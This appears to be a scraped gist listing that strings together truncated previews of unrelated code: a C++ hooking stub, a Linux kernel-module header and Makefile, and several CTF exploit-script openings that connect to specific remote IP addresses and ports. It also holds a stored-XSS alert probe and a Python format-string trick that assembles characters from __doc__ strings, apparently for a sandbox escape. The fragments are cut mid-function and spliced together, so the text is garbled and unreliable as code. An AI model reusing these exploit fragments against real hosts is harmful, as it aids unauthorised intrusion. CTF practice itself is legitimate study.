Skip to content

Instantly share code, notes, and snippets.

// SimpleHooking.cpp : Defines the entry point for the console application.
// Author : peternguyen
#include "stdafx.h"
#include <string>
#include <iostream>
#include <stdlib.h>
using namespace std;
/**
* @file ebbchar.c
* @author Derek Molloy
* @date 7 April 2015
* @version 0.1
* @brief An introductory character driver to support the second article of my series on
* Linux loadable kernel module (LKM) development. This module maps to /dev/ebbchar and
* comes with a helper C program that can be run in Linux user space to communicate with
* this the LKM.
* @see http://www.derekmolloy.ie/ for a full description and follow-up descriptions.
obj-m+=ebbchar.o
all:
make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) modules
$(CC) testebbchar.c -o test
clean:
make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) clean
rm test
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
import re
p = Pwn(host='47.74.147.103',port=20001,mode=1)
# p = Pwn(mode=1)
def exploit(**kargs):
alert("Stored XSS");
from Pwn import *
p = Pwn(mode=1)
def pA32(*args):
binary = ''
for arg in args:
binary += p.p32(arg)
return binary
import requests
import cPickle
import sys
import os
import hashlib
from base64 import b64encode, b64decode
import string
import json
import flask
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
p = Pwn(mode=1,host='47.75.128.158',port=9999)
def alloc(name,type):
p.sendint(1)
p.sendint(type)
target = 'UOTp%I()<>S'
out = ''
for c in target:
found = False
for func_name in dir("")[::-1]:
try:
doc = getattr(getattr("",func_name),"__doc__")
if c in doc:
idx = doc.find(c)
out += "{0.%s.__doc__[%d]}" % (func_name,idx)
#!/usr/bin/python
# Author : peternguyen
from struct import *
from base64 import b64encode,b64decode
import requests
import re
import hashlib
import random